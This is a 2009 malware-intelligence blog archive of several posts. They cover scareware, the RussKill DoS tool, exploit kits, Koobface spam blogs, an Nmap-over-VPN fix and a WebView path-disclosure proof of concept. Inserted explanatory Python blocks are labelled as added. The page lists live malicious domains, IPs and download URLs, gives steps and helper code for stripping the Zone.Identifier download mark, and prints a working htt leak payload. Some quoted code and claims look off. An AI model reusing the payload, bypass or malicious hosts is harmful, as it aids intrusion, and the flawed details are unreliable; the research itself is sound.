Friday, December 25, 2009

Anti-Virus Live 2010. Talking with the enemy

There is a widespread but mistaken belief that malicious code is trivial, and that any problem it causes is solved by formatting the system or buying one of the well-known anti-malware products on the market today.

The reality, however, is that behind the development of malware hides a very large business to which new "affiliates" are added every day. And when the product we plan to buy is itself the malware, we get exactly the opposite of protection.

That is the case of Anti-Virus Live 2010 or, what amounts to the same thing, Anti-Virus Elite 2010: scareware (rogue) malware whose processes and mechanisms for deceiving victims out of their money are evidently well oiled and well thought out.

As is usual with this type of threat, the strategy rests first on a website used as "bait" to lure potential victims, offering all sorts of justifications to "prove" the credibility of the fake antivirus, complemented by a typical disinformation campaign.

So far, nothing interesting, except for the option of requesting assistance via chat. Interesting. Let us check whether this feature is legitimate... Yes, it is.

So we opened a conversation through that option and, to our surprise, immediately got a response from the other side. The short chat conversation is shown below.

Dennis, the merchant, told us among other things that the antivirus is of course compatible with all versions of Windows, that it costs USD 27, that it only supports English, that there is no enterprise version, and that it has no problem removing Conficker.

Let us briefly discuss these points. Obviously the scareware must be compatible with all versions of Windows, since that is the audience the threat is aimed at. Why? Simply because more than 80% of home users run Windows as their main operating system, which is where the chance of finding a victim is greatest. That makes it much more likely to "close the deal".

For the same reason there is no GNU/Linux version, and not even a business-oriented version: companies usually have a higher level of security, where the scareware would probably not get results.

Why English and not Russian? Because English is the third most widely spoken language. Its price, USD 27, is a competitive figure in line with the average cost of legitimate antivirus products. And as for Conficker, had we asked about Koobface the answer would have been the same.

A very interesting detail that helps to grasp the true magnitude of the illegal malware business is the mistake the "affiliate" Dennis made when we asked for the URL to buy the fake solution. He gave us the URL registryfix.com/purchase and, when we pointed out that this was not the product in question, offered antivirus-elite.com/purchase as the corresponding URL.

However, we were trying to close the "deal" for Anti-Virus Live 2010, not Anti-Virus Elite 2010, which makes it clear that this is the same threat under different names, and that the same "partner" manages and markets several alternatives in the same way: in this case also the fraudulent sale of Registry Fix, another scareware associated with NoAdware and ErrorClean.

From a technical point of view, the domain of this threat resolves to the IP address 204.232.131.12, hosted by the ISP Rackspace in Hoboken, United States, under AS27357.

The history of this AS shows significant malicious-code activity.

From the website an executable named setup.exe is downloaded (MD5: C50DC619E13345DEC2444B0DE371DFD4), which is the scareware installer and has a low detection rate.

As we can see, cybercriminals never tire of spreading increasingly aggressive threats whose infection process is backed by marketing campaigns, some very similar to those used by legitimate antivirus companies.

Related information
A recent tour of scareware XIX
Green IT used to spread scarewar...
Scareware. In-the-Wild malware repository
Scareware. Deception strategy used by Personal Antivirus
MalwareRemovalBot scareware propagation campaign

Jorge Mieres
Malware Intelligence Blog

Thursday, December 17, 2009

RussKill. Application to perform denial of service attacks

Conceptually, a DoS (Denial of Service) attack consists of bombarding a service or computing resource with requests until it saturates and the system can no longer process data, so that those resources and services become inaccessible, "denying" access to anyone who wants them.

From a security standpoint, denial-of-service attacks are a major problem because many botnets, especially special-purpose ones, are designed to automate them, taking advantage of the computing power of the zombie network. In that case the attack is called a Distributed Denial of Service (DDoS).

Moreover, within the framework of cyberwarfare, this type of attack is part of the "war" arsenal with which conflicts between states are played out in virtual scenarios, with aims such as neutralising a state's vital services.

RussKill is a web application that falls within these activities and which, despite being extremely simple in both functionality and use, can mount an attack that is very effective and hard to detect.

As is customary in current crimeware, the web application is of Russian origin. It has a number of fields describing how and against whom to carry out the attack, letting you configure the packet sequence, that is, the volume of the flow. The "Hide url" option is a self-defensive measure intended to keep the attacking server from being detected.

Although there are several DoS attack methods, RussKill uses HTTP-flood and SYN-flood. In both cases the victims' servers are flooded, with HTTP requests and with TCP SYN packets carrying forged source IP addresses respectively.
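The following is an added example and not part of the original post or of the RussKill tool: two small detectors for the flood types just described, run over constructed traffic records. The record layouts, the thresholds (50 half-open SYNs per second, 100 requests per ten seconds) and the addresses are illustrative assumptions.

```python
# Added example, not part of the original post: simple detectors for the two
# flood types the post attributes to RussKill, run over constructed traffic.
# Record layouts, thresholds and sample addresses are assumptions for illustration.
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    """One TCP segment as a sensor might summarise it (constructed layout)."""
    ts: float     # seconds
    src: str
    dst: str
    dport: int
    flags: str    # "S" = SYN from client, "A" = client ACK completing the handshake


@dataclass(frozen=True)
class HttpRequest:
    """One HTTP request as seen in an access log (constructed layout)."""
    ts: float
    src: str
    path: str


def max_in_window(timestamps, window):
    """Largest number of events falling inside any interval of `window` seconds."""
    ts = sorted(timestamps)
    best = start = 0
    for end, t in enumerate(ts):
        while t - ts[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def syn_flood_targets(segments, window=1.0, threshold=50):
    """Return {(dst, dport): stats} for targets receiving >= threshold half-open
    SYNs per window. A SYN is half-open when the same (src, dst, dport) never
    sends the third-handshake ACK, which is what forged source addresses cause."""
    completed = {(s.src, s.dst, s.dport) for s in segments if s.flags == "A"}
    half_open = defaultdict(list)
    for s in segments:
        if s.flags == "S" and (s.src, s.dst, s.dport) not in completed:
            half_open[(s.dst, s.dport)].append(s)
    alerts = {}
    for target, syns in half_open.items():
        peak = max_in_window([s.ts for s in syns], window)
        if peak >= threshold:
            alerts[target] = {
                "half_open_per_window": peak,
                "distinct_sources": len({s.src for s in syns}),  # many == spoofing
            }
    return alerts


def http_flood_sources(requests, window=10.0, threshold=100):
    """Return {src: peak_requests_per_window} for clients exceeding the rate."""
    by_src = defaultdict(list)
    for r in requests:
        by_src[r.src].append(r.ts)
    flagged = {}
    for src, ts in by_src.items():
        peak = max_in_window(ts, window)
        if peak >= threshold:
            flagged[src] = peak
    return flagged


def constructed_segments():
    """Constructed sample: one legitimate handshake, then a spoofed SYN flood."""
    segs = [Segment(0.00, "192.0.2.10", "10.0.0.5", 443, "S"),
            Segment(0.01, "192.0.2.10", "10.0.0.5", 443, "A")]
    # 200 SYNs within one second, each from a different forged source, never acked
    segs += [Segment(5.0 + i * 0.005, "198.51.100.%d" % (i + 1), "10.0.0.5", 80, "S")
             for i in range(200)]
    return segs


def constructed_requests():
    """Constructed sample: two normal visitors and one client hammering '/'."""
    reqs = [HttpRequest(60.0 * k, "192.0.2.%d" % (20 + u), "/index.html")
            for u in range(2) for k in range(5)]
    reqs += [HttpRequest(100.0 + i * 0.01, "203.0.113.7", "/") for i in range(500)]
    return reqs


if __name__ == "__main__":
    print(syn_flood_targets(constructed_segments()))
    print(http_flood_sources(constructed_requests()))
```

The two signatures differ: a spoofed SYN flood shows up as a burst of half-open connections from many distinct, never-completing sources against one port, while an HTTP flood from a single tool such as this one shows up as an abnormal request rate from one client. A distributed HTTP flood from a botnet would instead need aggregate per-path thresholds, since each zombie may stay under the per-source rate.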

As I said at the start, denial-of-service attacks are a danger to any information system regardless of the platform supporting its services and applications, and in this case the site demonstrates how easily an attack of this type can be launched.

Related information
DDoS Botnet. New special-purpose crimeware

Jorge Mieres
Pistus Malware Intelligence

Friday, December 11, 2009

Using Nmap Remotely Through F5 FirePass VPN

Well, we all use the common hacking tools of the trade, like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.
I was connected to a network remotely through the company's F5 VPN appliance and wanted to scan the internal network.

It looked like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*

Once I pressed "Enter" I got:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time
WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won't work on Windows.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.

Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)

There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.

*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV ; or use mknod).

*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the --unprivileged command-line argument will help.

SOLARIS: If you are trying to scan localhost or the address of an interface and are getting '/dev/lo0: No such file or directory' or 'lo0: No DLPI device found', complain to Sun. I don't think Solaris can support advanced localhost scans. You can probably use "-PN -sT localhost" though.

QUITTING!

Then I realized that the VPN connection was a PPP device, probably at the top of Nmap's interface list, so Nmap was trying to use it for the scan. That is the point of failure, because Nmap on Windows without raw sockets (Windows XP SP2 and later) can only use Ethernet devices. So I played "imaginary Linux on Windows" and added the option "-e eth0", which tells Nmap to use the Ethernet device it indexes as 0 in its own interface list (nmap --iflist shows the names it assigns), and it worked like a charm.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time
Interesting ports on XXXXX (192.168.0.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

Thursday, December 10, 2009

Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables

I was in another day of jumping from client to client, securing another bank in Israel, when my girlfriend called and said "Honey, I am at the office, I have absolutely nothing to do and I can't connect from here to our computer at home to continue my project". I said, O.K., let's see what we can do in a 5 minute phone call. Now I just want to make it clear: my girlfriend is an Information Systems Instructor, she is no developer or hacker.

Me: "Honey, go to http://www.teamviewer.com, can you download it?"
Her: "Yes, but when I run the setup.exe it says something weird like 'Windows has blocked this software because it can't verify the publisher' and it won't let me install."

Me: "O.K. Open Start->Run, type notepad and a space, now click on setup.exe and drag it to the text box at Start->Run. Now add ':Zone.Identifier' just before the last quote. What do you see?"
Her: "I see something like ZoneId=3, now what?"
Me: "I can't talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye."

After 10 minutes I got an SMS: "thanks honey it worked!!!".
Well, we found a bug. I wouldn't really call it a "privilege escalation", but I guess you don't have to be a hacker to bypass Windows security restrictions :)
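What the conversation above edits is the Zone.Identifier NTFS alternate data stream that Internet Explorer attaches to downloaded files (the "mark of the web"): ZoneId=3 is the Internet zone, and the Attachment Manager reads it to decide whether to warn about or block the file. The code below is an added example, not part of the original post: it parses and rewrites that stream. The stream text is constructed; read_mark, set_mark and remove_mark only work on NTFS volumes under Windows, and the file name setup.exe is an assumption.

```python
# Added example, not part of the original post: read, parse and rewrite the
# Zone.Identifier alternate data stream the post is talking about. The stream
# content used below is constructed; the on-disk helpers need NTFS on Windows.
import os

# Zone numbers used by the Windows URL security zone model.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}
STREAM_SUFFIX = ":Zone.Identifier"


def parse_zone_identifier(text):
    """Parse the INI-style stream ('[ZoneTransfer]' section, Key=Value lines).
    Returns the ZoneTransfer key/value pairs; ZoneId is converted to an int and
    dropped if it is not numeric, so a mangled mark counts as no mark."""
    values = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    if "ZoneId" in values:
        try:
            values["ZoneId"] = int(values["ZoneId"])
        except ValueError:
            del values["ZoneId"]
    return values


def build_zone_identifier(zone_id):
    """Serialize the stream the way the downloader writes it (CRLF line ends)."""
    return "[ZoneTransfer]\r\nZoneId=%d\r\n" % zone_id


def is_from_untrusted_zone(values):
    """Internet (3) and Restricted (4) are the zones the shell treats as untrusted;
    a missing ZoneId means the file carries no mark at all and is never blocked."""
    return values.get("ZoneId") in (3, 4)


def read_mark(path):
    """Read the mark of a file on disk (Windows/NTFS only; {} when absent)."""
    try:
        with open(path + STREAM_SUFFIX, "r", encoding="ascii", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return {}


def set_mark(path, zone_id):
    """Rewrite the mark, e.g. to 1 (Local intranet) as suggested in the post."""
    with open(path + STREAM_SUFFIX, "w", newline="") as f:
        f.write(build_zone_identifier(zone_id))


def remove_mark(path):
    """Delete the stream entirely; os.remove accepts the file:stream form on Windows."""
    os.remove(path + STREAM_SUFFIX)


if __name__ == "__main__":
    # Constructed stream content, as Internet Explorer writes it for a download.
    mark = parse_zone_identifier("[ZoneTransfer]\r\nZoneId=3\r\n")
    print(mark, ZONE_NAMES[mark["ZoneId"]], is_from_untrusted_zone(mark))
    print(parse_zone_identifier(build_zone_identifier(1)))
```

The point the example makes is the one the post stumbled on: the mark lives in a stream that any user with write access to the file can edit or delete, so any control that relies on it (the publisher warning included) is a convenience for honest users, not a boundary against a determined one.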

Fusion. A concept adopted by current crimeware II

It is increasingly common in our research to find several Exploit Pack crimeware kits hosted and actively "operating" on the same server, from which the zombies that form part of the fraudulent business are controlled and managed.

A while ago we commented on ElFiesta and ZeuS coexisting in the same environment and serving the same objectives.

This time the merger is between Fragus (an increasingly popular crimeware kit) and ElFiesta. Both packages are hosted on the same server, although that does not necessarily mean they are operated by the same botmaster.

The domain hosting them is as follows:

Fragus is at http://hotgirldream.net/far/ and ElFiesta is hosted in another folder, http://hotgirldream.net/content/. As we can see, they share the server with IP address 210.51.166.233, located at Yizhuang IDC of China Netcom, Beijing.

This shows that "business" opportunities are not limited to the sale of crimeware, malware, exploit packs and other fraudulent activities; another alternative is to provide the infrastructure which, in terms of its computing capacity, streamlines criminal processes.

Related information

Fusion. A concept adopted by current crimeware
Fragus. New botnet framework In-the-Wild
ZeuS and power Botnet zombie recruitment
ElFiesta. Zombie recruitment across multiple threa...

Jorge Mieres
Pistus Malware Intelligence

Sunday, December 6, 2009

Disinformation campaign to spread malware

Disinformation basically consists of distorting or manipulating information so that the recipient ends up believing something completely untrue, from which the originator gains an advantage. Rumour, for example, is a tool used in disinformation campaigns. In turn, disinformation is itself a tool that provides useful information at the right time (intelligence).

Transferred to the computing field, this is nothing more nor less than a social engineering methodology increasingly used by malware developers to try to win users' confidence and then take advantage of it to run the infection process.

We usually see it on pages spreading scareware-type malware (also known as rogue), where we find images of certifications such as Virus Bulletin and AV-Comparatives, or of publications like PC Magazine or PC World which, although they do not perform the same function as the former, enjoy "trust" among the public.

Another alternative focuses on trying to prove that this "solution" (the scareware) is the best. This is done through fake comparisons that call into question the detection rates of antivirus companies well known in the market.

Both deception strategies appeal to what is known as authority, represented by those certifications and publications in the "real" antivirus and information technology worlds respectively.

In this regard, I recently discovered another deception method, also aimed at spreading disinformation so that users believe the information and act accordingly.

It consists of pretending that the offered file is free of malicious code, again appealing to authority, but in this case to the organisations that let anyone verify the integrity of a file by submitting it online to the antivirus solutions most trusted in the market, for example services such as VirusTotal or VirScan. A screenshot is shown below.

The domains involved are hosted on the IP 213.5.64.20, located in the Netherlands (Altushost Inc), although not all of them spread the threat. Among them:

safehostingsolutions.com/download.html
fileaddiction.com/download.html
freedatatransfer.com/download.html
freedownloadthanks.com/download.html
megasecuredownload.com/download.html
qualityupload.com/download.html

The downloaded files have the following names:
  • Hpack Generator.exe (91b31ea8c551397cd5b1d38ec1aa98dd) - Result: 8/40 (20.00%)
  • UAV Generator.exe - same hash and result as above
  • Knight Generator.exe - same as above
  • LG Generator.exe - same as above
  • Kings Generator.exe - same as above
  • DBlocks Generator.exe (53e3256bef0352caf794b641f93a32d5) - Result: 6/40 (15%)

As can be seen, besides the fact that this new deception trick, though quite trivial, has a high impact on effectiveness, the detection level of the two malicious codes is very low: only 15% and 20% of 40 antivirus engines.

No need to panic, but be vigilant.

Related information

A recent tour of scareware XVIII
Computer intelligence, information security and cyber-war
Deception techniques that do not go out of style

Jorge Mieres
Pistus Malware Intelligence

Friday, December 4, 2009

A brief glance inside Fragus

Fragus is a web application of Russian origin developed for managing zombies, which has recently entered the clandestine crimeware market at an affordable price (USD 800) considering the criminal capabilities it offers.

The crimeware is basically composed of five sections: Statistics, Files, Sellers, Traffic links and Preferences. Each handles a specific task and they complement one another.

The Files panel handles the executable file that will be spread.

Sellers manages the exploits. In this case they correspond to the first version of Fragus.

The Traffic links module allows a "preview" and the configuration of the iframe script that will be injected into the page acting as the "driver" for running the exploits configured in the previous panel, which look for vulnerabilities on the victim's machine.

One of the patterns found in every package of this kind is the Statistics module. It provides the intelligence the botmaster needs to get a detailed report not only on the zombie machines but also on certain aspects needed to know in detail which exploit should be run.

Another interesting pattern we can deduce from this information is that the operating system most exploited is Windows XP with Internet Explorer; that the most effective exploit, despite being very old (MS06-014), is the one targeting the MDAC vulnerability; and that the countries with the highest infection rates are the USA and Korea.

This is a common scenario, and perhaps the relevant factor is the inference that it is due to the large number of users running an unlicensed copy of the Microsoft operating system, which leads them not to update.

Finally, another important factor not to be overlooked is that cybercriminals are not interested in the controversy over the security levels of one operating system or another (Windows, GNU/Linux, Mac OS): all of them fall into the same category of "potential victims", because the vulnerabilities exploited are at layer 7, the application layer.

Related information
Fragus. New botnet framework In-the-Wild
JustExploit. New exploit kit that exploits Java
DDoS Botnet. New special-purpose crimeware
T-IFRAMER. Kit for injecting malware In-the-Wild
ZoPAck. New alternative for exploiting vulnerabilities

ZeuS Botnet and its zombie recruitment power
Eleonore Exploits Pack. New crimeware In-the-Wild
Liberty Exploit System. Another alternative (...) for botnet control

Jorge Mieres
Pistus Malware Intelligence

Thursday, December 3, 2009

Exploiting WebView through Internet Explorer to remotely discover the Windows directory

Like any large product, the Microsoft Windows operating system is built on the code of its previous versions. Some of that code goes back as far as Microsoft Windows 98.

Windows 98 introduced a new look called "WebView", in which the way folders and the desktop are displayed are HTML templates, which the default administrative user could also edit. You can read more about it here: http://msdn.microsoft.com/en-us/library/bb776835(VS.85).aspx

Those HTML templates had the extension "htt". So that folder templates could work properly and display the current folder, a few automatically expanded variables were added to the module that filters the "htt" files. These are:
%TEMPLATEDIR% (hardcoded)
%THISDIRPATH% (hardcoded)
%THISDIRNAME% (hardcoded)
%BACKGROUNDIMAGE% (registry)
%LOGOLINE% (registry)

This mechanism still lives today deep inside Windows XP's code, in two modules in the system32 folder:
1) Webvw.dll
2) Mshtml.dll

Webvw.dll is the module responsible for WebView installation and normal operation, and mshtml.dll is the main module for HTML filtering and rendering used by Windows Explorer and Internet Explorer.

When Microsoft Windows is installed and webvw.dll is registered, it adds its CLSID and a few registry keys. The interesting ones are:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\BACKGROUNDIMAGE
Default = "%SystemRoot%\Web\wvleft.bmp"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\LOGOLINE
Default = "%SystemRoot%\Web\wvline.gif"

Every time an htt file is rendered, without any local/remote or zone consideration, those variables are replaced with the current system's paths.
This is the code inside mimeflt.cpp that contains the bug (lines 360 to 433):

#define REG_WEBVIEW_TEMPLATE_MACROS TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WebView\\TemplateMacros")

void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch)
{
    if (SIZEOF(char) == nCharSize) {
        SHAnsiToTChar((LPCSTR)pBuf, psz, cch);
    } else {
        ASSERT(nCharSize == SIZEOF(WCHAR));
        SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);
    }
}

// Looks up a macro name under ...\WebView\TemplateMacros\<MACRO> and returns the
// key's default value as the expansion (empty string if nothing is found).
// Nothing on this path checks which security zone the template came from.
void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize)
{
    TCHAR szExpansion[MAX_PATH];
    szExpansion[0] = TEXT('\0');
    TCHAR szTCharMacro[MAX_PATH];

    ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));
    TCHAR szKey[MAX_PATH];
    lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));
    StrCatBuff(szKey, TEXT("\\"), ARRAYSIZE(szKey));
    StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));
    HKEY hkMacros;
    if (RegOpenKey(HKEY_CURRENT_USER, szKey, &hkMacros) == ERROR_SUCCESS && RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &hkMacros) == ERROR_SUCCESS) {
        DWORD dwType;
        DWORD cbData = SIZEOF(szExpansion);
        SHQueryValueEx(hkMacros, NULL, NULL, &dwType, (LPBYTE)szExpansion, &cbData);
        RegCloseKey(hkMacros);
    }

    ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);
}

// Called by the MIME filter for each %VAR% token found in the htt stream.
int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp)
{
    if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {
        // hardcoded: the machine's template directory under the Windows directory
        if (!_szTemplateDirPath[0]) {
            GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);
        }
        *ppszExp = _szTemplateDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {
        // hardcoded: full path of the folder being viewed
        if (!_szThisDirPath[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));
        }
        *ppszExp = _szThisDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {
        // hardcoded: name of the folder being viewed
        if (!_szThisDirName[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));
        }
        *ppszExp = _szThisDirName;

    } else {
        // everything else (BACKGROUNDIMAGE, LOGOLINE, ...) comes from the registry
        ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);
        *ppszExp = _szExpansion;
    }

    return _StrLen(*ppszExp);
}

In Windows XP the variables %THISDIRPATH% and %THISDIRNAME% were removed from the MIME filter, but %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% are still translated into paths under the current Windows directory.

The proof-of-concept code (remote WebView macro translation):
Save it on a remote host with the htt extension and load it as http:///filter_trap.htt (fill in the host).
--------------------------- filter_trap.htt start --------------------------------
<div id="BACKGROUNDIMAGE">%BACKGROUNDIMAGE%</div>
<div id="LOGOLINE">%LOGOLINE%</div>
<div id="TEMPLATEDIR">%TEMPLATEDIR%</div>
<script>
alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);
alert(document.getElementById("LOGOLINE").innerHTML);
alert(document.getElementById("TEMPLATEDIR").innerHTML);
</script>
--------------------------- filter_trap.htt end --------------------------------
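An added example, not code from the original post and not Microsoft's: a model of the macro substitution described above, with the expansion done the way the post describes (regardless of where the template was loaded from) next to a zone-gated variant, applied to a constructed copy of filter_trap.htt. The expansion values (a C:\WINDOWS install), the zone numbers and the helper names are assumptions.

```python
# Added example, not part of the original post and not Microsoft's code: a model
# of the htt %MACRO% substitution, the vulnerable form (expand regardless of the
# template's origin) beside a zone-gated form. Values and the sample template
# are constructed assumptions for illustration.
import re

MACRO_RE = re.compile(r"%([A-Z]+)%")

# What the three surviving macros expand to on an assumed C:\WINDOWS install
# (TEMPLATEDIR from the shell, the other two from the TemplateMacros registry keys).
MACROS = {
    "TEMPLATEDIR": r"C:\WINDOWS\Web",
    "BACKGROUNDIMAGE": r"C:\WINDOWS\Web\wvleft.bmp",
    "LOGOLINE": r"C:\WINDOWS\Web\wvline.gif",
}
ZONE_LOCAL_MACHINE, ZONE_INTERNET = 0, 3


def expand_macros_vulnerable(template, macros=MACROS):
    """Mirror of the filter's behaviour: every known %MACRO% is substituted, no
    matter which security zone the template was loaded from. Unknown macros
    expand to '' like ExpandMacro's untouched empty szExpansion."""
    return MACRO_RE.sub(lambda m: macros.get(m.group(1), ""), template)


def expand_macros_zone_gated(template, zone, macros=MACROS):
    """Hardened form: only templates from the local machine zone are expanded;
    anything else keeps the literal %MACRO% tokens, so no local path leaks."""
    if zone != ZONE_LOCAL_MACHINE:
        return template
    return expand_macros_vulnerable(template, macros)


def leaked_windows_dir(rendered):
    """What the remote script reads back: the directory shared by the leaked paths,
    i.e. the first two path components such as C:\\WINDOWS (None if nothing leaked)."""
    paths = re.findall(r'[A-Za-z]:\\[^<"\s]+', rendered)
    if not paths:
        return None
    return "\\".join(paths[0].split("\\")[:2])


# Constructed copy of the post's filter_trap.htt as served from a remote host.
FILTER_TRAP = (
    '<div id="BACKGROUNDIMAGE">%BACKGROUNDIMAGE%</div>\n'
    '<div id="LOGOLINE">%LOGOLINE%</div>\n'
    '<div id="TEMPLATEDIR">%TEMPLATEDIR%</div>\n'
)

if __name__ == "__main__":
    rendered = expand_macros_vulnerable(FILTER_TRAP)
    print(rendered)
    print("leaked:", leaked_windows_dir(rendered))
    gated = expand_macros_zone_gated(FILTER_TRAP, ZONE_INTERNET)
    print("gated:", leaked_windows_dir(gated))
```

The gated variant is the check the original filter lacks: the decision to substitute is made on the template's origin, not on the macro name, which is why removing two macros in Windows XP did not close the leak through the remaining three.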

Tuesday, December 1, 2009

Koobface campaign spread through Blogspot

A massive campaign spreading the Koobface worm In-the-Wild is using blogs created on the Blogspot service as its strategy.

Koobface has become a nightmare for social networks and, even though its propagation strategies do not change, this malware has been active for almost two years with a significant infection rate, making it one of the largest botnets today.

The Blogspot domains used as cover for the spread are:

pannullonumair.blogspot.com
haladynalatosha.blogspot.com
macdougalmuskan.blogspot.com
mailletjamaica.blogspot.com
ledrewrooney.blogspot.com
brasenoktayoktay.blogspot.com
toludestany.blogspot.com
edgarbillison.blogspot.com
piotrowiczlyanne.blogspot.com
brochoiredeedee.blogspot.com
decuyperantohny.blogspot.com
derrenpassini.blogspot.com
elsenelsenumthun.blogspot.com
elsyelsysalah.blogspot.com
fanjonappuappu.blogspot.com
fredrikadantos.blogspot.com
genelleabril.blogspot.com
gilkerharjyot.blogspot.com
hadzilashawn.blogspot.com
insalacotecwyn.blogspot.com
janitasaels.blogspot.com
jodelinscheufler.blogspot.com
jones-allentammey.blogspot.com
jurgisbooty.blogspot.com
karanjeetisoardi.blogspot.com
dralleboyeboye.blogspot.com
maidenhermann.blogspot.com
messer-bustamantetimpriss.blogspot.com
murachaniananoushka.blogspot.com
nevnevsculthorpe.blogspot.com
parrisvistisen.blogspot.com
porierkunlekunle.blogspot.com
rotermundraimon.blogspot.com
sharonyacorvil.blogspot.com
sodorabardan.blogspot.com
tendaiblunk.blogspot.com
turskeybrianna.blogspot.com
zhuochengbate-pelletier.blogspot.com
ziziziziboyter.blogspot.com

Anyone accessing one of these domains is redirected to a page that mimics the typical YouTube screen. A screenshot is shown below.

Immediately afterwards it tries to download a binary called "setup.exe" (MD5 6d8ac41c64137c91939cced16cb5f2fe), which has a low average detection rate. This binary in turn downloads and executes other malicious code.
Each of these files is downloaded from domains in the style of "homemadesandwiches.com/.sys/?getexe=ff2ie.exe".

The binary v2captcha.exe is in charge of breaking the CAPTCHA that Blogspot requires for blog registration, creating blogs massively and with random names, which then redirect to the Koobface download through, as mentioned at the beginning, a fake YouTube page that uses the same visual social-engineering approach as other similar campaigns.

Undoubtedly Koobface is another malicious code that persists despite many of its variants being detected by most antivirus companies.

Related information
Symbiosis of present-day malware. Koobface

Jorge Mieres
Pistus Malware Intelligence

Avatar - The Movie - HD Trailer 1080p
This seems to be a very nice and well-made movie. Looking at the trailer, I thought I should share it with our blog viewers.

Enjoy the Trailer! Copyrights Reserved to the Movie Makers!

EF